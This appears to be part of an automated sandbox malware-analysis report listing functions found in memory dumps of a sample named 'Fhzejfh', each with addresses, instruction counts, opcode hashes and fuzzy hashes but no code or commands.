                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bb396f5131760d1a8096fcdc341fca47764ac69610294408655a3bc75094fc09
                                                                            • Instruction ID: 9bfca2fa65823db464a5419b96b4c698b31474448313ce3def0d0d4ff4068408
                                                                            • Opcode Fuzzy Hash: bb396f5131760d1a8096fcdc341fca47764ac69610294408655a3bc75094fc09
                                                                            • Instruction Fuzzy Hash: C8215335A002199FDF15DFA8C5589DE7BB2FF9C320F148229E415A7390DE759C86CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7C2B0 Relevance: .1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c975ccb4cf9d2f749dda277cc838895742b5bf87ff26c9059796752f2868a1db
                                                                            • Instruction ID: bd99052da4880f044e450556ba8d3bfe760630c75b51033f4b969973fb51bd78
                                                                            • Opcode Fuzzy Hash: c975ccb4cf9d2f749dda277cc838895742b5bf87ff26c9059796752f2868a1db
                                                                            • Instruction Fuzzy Hash: 66217A70A10205DFDB04DFA4C958BADBBF2BF48314F249069E409A73A0EB759D81CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7D3A0 Relevance: .1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ef6bd6fa7330704f4cec5852c65ce5ab750e60df875d3f4183705bf47ce64fce
                                                                            • Instruction ID: e9501546b10b828ea4ca5ff1d96beda28307ed0b32b749dc842b2f6c3c3367d9
                                                                            • Opcode Fuzzy Hash: ef6bd6fa7330704f4cec5852c65ce5ab750e60df875d3f4183705bf47ce64fce
                                                                            • Instruction Fuzzy Hash: 9B21C2306003048FCB10EB68E94669E7BE6FB88354F508939D00AD7399DB75A90587E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7DA28 Relevance: .1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60cb0d7b69d28ae37309135f404b0256fd510c5c132c8dae36c1f8a8c59605ee
                                                                            • Instruction ID: 012b5f094ab7e5d741d25c6e4e833059f7e75ed9fb88064b1fdd91cedf5e7432
                                                                            • Opcode Fuzzy Hash: 60cb0d7b69d28ae37309135f404b0256fd510c5c132c8dae36c1f8a8c59605ee
                                                                            • Instruction Fuzzy Hash: 1C213D35A00219DFCB15DFA9C9489DE7BB6FF8C320F148129E815A7390DA759C81CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7C0CF Relevance: .1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6881df861a94d1e32368823de9546cc3c7bf86722fe875512fb1a34a07aa6f0b
                                                                            • Instruction ID: b1d2dffe227aa79ad091e01a69897e8515c21626164c313d95e37ab2da6d8299
                                                                            • Opcode Fuzzy Hash: 6881df861a94d1e32368823de9546cc3c7bf86722fe875512fb1a34a07aa6f0b
                                                                            • Instruction Fuzzy Hash: 89217934F102198FDF14DFA8E954AEDBBF2AF88310F54C069D809F7295EB3499018BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D70BC7 Relevance: .1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: df1b3c5d1fe31fc15be172de771c1921a2ce304b98887248911426bd1918e089
                                                                            • Instruction ID: 523de9ab005e18b32a6cc333bbdbb820607b134cd0ea1791eadcfbefa7f39e77
                                                                            • Opcode Fuzzy Hash: df1b3c5d1fe31fc15be172de771c1921a2ce304b98887248911426bd1918e089
                                                                            • Instruction Fuzzy Hash: 08216274A00209AFDB04EFB4D9559AEBBB6EF89300B108469E505D7365EB31ED02CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74C60 Relevance: .1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 303e1fbc8290f02687cbe15030fea60a2f7319281da2d4b673be66448fbae939
                                                                            • Instruction ID: 7cfc2ca327d331f5339b584c6dca9e8a06def0c6071cfc429f32ed03c94e1e0c
                                                                            • Opcode Fuzzy Hash: 303e1fbc8290f02687cbe15030fea60a2f7319281da2d4b673be66448fbae939
                                                                            • Instruction Fuzzy Hash: 35210575A013099FCB05DFB8D9445AEBBB6EFC9300B0081A9D405E7365DB35AE06CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7E7DB Relevance: .1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c6ef33acaab404fe02a8b0bb9f776b9ad7bc8affd24b4c459bfb84af0b7ed588
                                                                            • Instruction ID: e40702e987e307a359facc94687ea8d83ea884afa9e6e6a014b3c1bd415230de
                                                                            • Opcode Fuzzy Hash: c6ef33acaab404fe02a8b0bb9f776b9ad7bc8affd24b4c459bfb84af0b7ed588
                                                                            • Instruction Fuzzy Hash: F8119135B002059FDB54DF698844BAE7BF2ABCC750F25846AE559D7380EB34C902CBB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00A1D1D3 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.471813138.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_a1d000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e87306563b5619f7196d99b150be5a71ccd3a45526b644d63ba900d9ba2ba174
                                                                            • Instruction ID: a4e1e23a08b77b3ad571f81064e0d967fab53a03a29746d91b36e43cf412f301
                                                                            • Opcode Fuzzy Hash: e87306563b5619f7196d99b150be5a71ccd3a45526b644d63ba900d9ba2ba174
                                                                            • Instruction Fuzzy Hash: 0421B176504240DFDB16CF54D9C4B96BFB2FB84310F28C6A9DC084B656C33AD89ACBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D70BD8 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 51dd6918267ef60cce0d424d1a090659114d4a802684eb4d94e523939a5a9854
                                                                            • Instruction ID: d8bfd99ad504984d8cd94094707a5fefb7804d17f19fa1d40bfdcc4ba4393ef6
                                                                            • Opcode Fuzzy Hash: 51dd6918267ef60cce0d424d1a090659114d4a802684eb4d94e523939a5a9854
                                                                            • Instruction Fuzzy Hash: 09114278A002099FCB44EFB5D9554AEBBB6EF88300B108469E505E7354EB31ED06CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00A1D3AF Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.471813138.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_a1d000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7c0950334716d25cacc26a968033e784a243883c4adbded9c143211097e17f37
                                                                            • Instruction ID: 8ec1d142a3c65deedc7c0782f2a6714821a1d34de1aabd70fc1a238151f9b951
                                                                            • Opcode Fuzzy Hash: 7c0950334716d25cacc26a968033e784a243883c4adbded9c143211097e17f37
                                                                            • Instruction Fuzzy Hash: A111E676504280CFDF16CF10D9C4B56BF71FB94324F24C5A9D8494B616C33AE89ACBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74C70 Relevance: .1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d750972b6ef1421d5225a0557e4c0f76c780a87dff1171db89ec2d51425e6dc
                                                                            • Instruction ID: 074c0dce19701dc1ac19400ca368acafd83aee7d40c6678bdf0570141b88523c
                                                                            • Opcode Fuzzy Hash: 5d750972b6ef1421d5225a0557e4c0f76c780a87dff1171db89ec2d51425e6dc
                                                                            • Instruction Fuzzy Hash: 04116339A002099FCB04DFA8D9455AEBBB6EF88300F508569D505E7364DB35AE06CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7E4A8 Relevance: .1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8761de44443cc8b60b772d4b2898ad6d747dd1dbd9a2ec8c1e613cf4ea6967c7
                                                                            • Instruction ID: cc4d5909a08bc082af20d3222d96f7dd7d6d13c9e5a31428366e2c882a4553da
                                                                            • Opcode Fuzzy Hash: 8761de44443cc8b60b772d4b2898ad6d747dd1dbd9a2ec8c1e613cf4ea6967c7
                                                                            • Instruction Fuzzy Hash: 65112B34A0120DEFDB14CF98E684AEDBBF5AF48314F108565E405A7390EB709D05CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7D84B Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bb247a146367bb5e46b2a170fef7a944b25b2f9e5d00b6ec3a615c1dfa0ae1b5
                                                                            • Instruction ID: 69e406882b70839ed27ef1c582942df21d94f270ab030c059f747a602cd4e213
                                                                            • Opcode Fuzzy Hash: bb247a146367bb5e46b2a170fef7a944b25b2f9e5d00b6ec3a615c1dfa0ae1b5
                                                                            • Instruction Fuzzy Hash: DC014776F081115FE7218698AC4079EFB71EFC8320F14816BD509DB351D6619C02C3D1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D77F97 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d182cb11c678b747951ee143f684a6aec79ba2ec4e209e3e33790c70a686f8a5
                                                                            • Instruction ID: bf61ea8d451d912c8a8a71dc6984dda80938c17a622f9d7b853cc8774f79a315
                                                                            • Opcode Fuzzy Hash: d182cb11c678b747951ee143f684a6aec79ba2ec4e209e3e33790c70a686f8a5
                                                                            • Instruction Fuzzy Hash: F9014C31B081105FD71547289944BAEB7E2EF8A350F25892EF80ED7351EE748C028371
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D77B91 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7fb0081f11c3fed443011a43a7221df07c0b8701b710d3f1320991ff6128c386
                                                                            • Instruction ID: 9cba3b943cf6bd359d98640db567457dd5757c2baf2952883bf12c15a6293457
                                                                            • Opcode Fuzzy Hash: 7fb0081f11c3fed443011a43a7221df07c0b8701b710d3f1320991ff6128c386
                                                                            • Instruction Fuzzy Hash: 49112134708214CFDB04DBA4D959BAD77B1FB44714F218856E50AEB390E771DD01CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D71DCB Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e1452a28c56cc8779072895297ad18046c5bb39bdb3f8a0f9526d245b1c91e40
                                                                            • Instruction ID: ca23a8a120ee8844ebe1e4d13d443d0d90c93bc6888a7a07af5e38fd0f5cdec5
                                                                            • Opcode Fuzzy Hash: e1452a28c56cc8779072895297ad18046c5bb39bdb3f8a0f9526d245b1c91e40
                                                                            • Instruction Fuzzy Hash: CD014C387085049FC7105B5D8815B6A7BE6FF8E340F148166FA4DC73A1EA308C0083B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D715F1 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6886139de282f26aacc258e7e9477c3721138542f4914a8c7b0445d26b65a96a
                                                                            • Instruction ID: 23c691a7717c5f9ae5b24ef8c54f7b627f1a7afac604b11de9e7cdc84be1b93a
                                                                            • Opcode Fuzzy Hash: 6886139de282f26aacc258e7e9477c3721138542f4914a8c7b0445d26b65a96a
                                                                            • Instruction Fuzzy Hash: E8113C38B00204CFDB14DF9CE958BAD77B0EF48315F288165E50ADB3A4E675DD458B21
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D71DD8 Relevance: .0, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5b1c00f730c4d52da06dfffd67aae20220bd20f35381df704f9f4310933b2237
                                                                            • Instruction ID: 8af61846886aa893198470be049dc8d51e3bb0d592e4660f00d7a6133b5c6409
                                                                            • Opcode Fuzzy Hash: 5b1c00f730c4d52da06dfffd67aae20220bd20f35381df704f9f4310933b2237
                                                                            • Instruction Fuzzy Hash: 580126397081149FC7146B5DA805B6AB7E6EBCC350F20822AFA0EC7391EA30CC0083B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D77FA8 Relevance: .0, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 97f250454b6e2d09252cbc64ee6f9c0ffe0006fec10f33db5de236559e3868cb
                                                                            • Instruction ID: 102e5484340a0e2d65272daf0da2b6f94a416c4080c5e0c83010e161676c168c
                                                                            • Opcode Fuzzy Hash: 97f250454b6e2d09252cbc64ee6f9c0ffe0006fec10f33db5de236559e3868cb
                                                                            • Instruction Fuzzy Hash: 5301F2317081049FD7145B59EA44B6EB6D6EF89360F24882AF50ED7390EE708C4083B5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D77318 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 805ade32e3962bf69abd77200ec334b7424e49e1d4dd5bd630df8433e7acb76a
                                                                            • Instruction ID: 49515cd1ac432ca69a676310a2d420bc1d3ee97591632db7b3e0997f7d7555d8
                                                                            • Opcode Fuzzy Hash: 805ade32e3962bf69abd77200ec334b7424e49e1d4dd5bd630df8433e7acb76a
                                                                            • Instruction Fuzzy Hash: 6111A5307081428FD718EB29D955BAA3BA2EF45344F14C86DD80ACB3A9EF35DC01DBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D70CB0 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40ef34c25f5299e2c0003ccea6c73bf99eb3c2b1e920199bafdb87ede0f742b7
                                                                            • Instruction ID: ed9b8dec3cf15230eca21bc40329e6533935062f080a6fb89cc75c32eaa83303
                                                                            • Opcode Fuzzy Hash: 40ef34c25f5299e2c0003ccea6c73bf99eb3c2b1e920199bafdb87ede0f742b7
                                                                            • Instruction Fuzzy Hash: 3501F4313047458BCB29A768E51063B3BE2DBCA710B55C97EE04EC75EAEE24EC858365
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D70D78 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dbc043435619609c3bf3ffa6aa581463b85e2c9f41eb50526439c2271a7eef12
                                                                            • Instruction ID: 0a95d1bceb8f1cd6c6a427ca7e7f91fe947795058daafe2b205fdf8e05fcb800
                                                                            • Opcode Fuzzy Hash: dbc043435619609c3bf3ffa6aa581463b85e2c9f41eb50526439c2271a7eef12
                                                                            • Instruction Fuzzy Hash: D2119A34340241CFE765EB78D558B6A3FA2AF89304F14C068D40ACB6A6FA39EC01CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7CAF1 Relevance: .0, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c28f0d5790dc3e5ebd1440b54ae379a145b6e03b90d6c7ae225f1315beab432a
                                                                            • Instruction ID: 594caacb02f05cd511c59e55da3a5a81d49142dedc404f4920b6057f23e0d879
                                                                            • Opcode Fuzzy Hash: c28f0d5790dc3e5ebd1440b54ae379a145b6e03b90d6c7ae225f1315beab432a
                                                                            • Instruction Fuzzy Hash: EC013935700205E78F08BBB4BA2D0AC7B96EB893523405C6EE507D73A1DE359A444B3A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74DA9 Relevance: .0, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9341d26c9f74c41a2b6900a7e5e887ce71b127e5122516238035e310488f532e
                                                                            • Instruction ID: c28b8bf0c0b977476215b5af9cb190ae55b757bbba183faf02d569c83a88d8d0
                                                                            • Opcode Fuzzy Hash: 9341d26c9f74c41a2b6900a7e5e887ce71b127e5122516238035e310488f532e
                                                                            • Instruction Fuzzy Hash: 9301F2B8D0020EEFCF40DFB9E5405ADBBF0EB44310F00A6A9D008DB390EE311A048B80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7FC13 Relevance: .0, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 99e1e596a4651c9944b697249c28b10928830f419dcd3c28cea6bf2af0eaa235
                                                                            • Instruction ID: 334cce2931131cc12bb043947f7889310eb8bd65cc3cf285350ca16016df0096
                                                                            • Opcode Fuzzy Hash: 99e1e596a4651c9944b697249c28b10928830f419dcd3c28cea6bf2af0eaa235
                                                                            • Instruction Fuzzy Hash: 8C015E3AE00609DFCB11DFA9D54469EBBB0EF89700F108169D419A7310EB349A05CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D709D8 Relevance: .0, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 85ca79d203cff60ed72f58d95935d7e0a8798c93b550f00adddc8b8ac72f2ce3
                                                                            • Instruction ID: 82dd3cb05401756c57af7129d3a395f99f9e8041ddb973c1943b7ca958d62c68
                                                                            • Opcode Fuzzy Hash: 85ca79d203cff60ed72f58d95935d7e0a8798c93b550f00adddc8b8ac72f2ce3
                                                                            • Instruction Fuzzy Hash: 11F08C747441508FC345DB78E868A683FE1EF89311B1A40EAFA46CB3B2DE30CC008B60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D77B13 Relevance: .0, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7005e974f8babf88a425395f91292b3fc82b444a415492f70c49948f5c9381e1
                                                                            • Instruction ID: a923285b20515dab205a4ab8d6759011a1d46eb6e5e390bee0fe5648e989ad60
                                                                            • Opcode Fuzzy Hash: 7005e974f8babf88a425395f91292b3fc82b444a415492f70c49948f5c9381e1
                                                                            • Instruction Fuzzy Hash: 80014B30B04205CFC7049FA4C854BADBBB2FF88314F244869D40ADB3A4EBB48C01CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D71573 Relevance: .0, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 66eb3e46edeebc8df3c9d20106b0e99766749ae69b33acc2bb5c1933fe70f076
                                                                            • Instruction ID: 493ab87b5cb5827a05bfa8c09fe822fe6cc1e462071da9f875e8beb2b697f67e
                                                                            • Opcode Fuzzy Hash: 66eb3e46edeebc8df3c9d20106b0e99766749ae69b33acc2bb5c1933fe70f076
                                                                            • Instruction Fuzzy Hash: C8011A78B002058FCB18CBA9C854A6DBBB1BF88300F144169E406DB3A5EBB0CC05CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7C121 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: abf280674ddb0be1454e7472dd85e1d77055bd875b0d33ca8767bb88e1815191
                                                                            • Instruction ID: fbfe59c998a470cf013ab44252fa269852e9eddf2a6ef27194d7e1b893552077
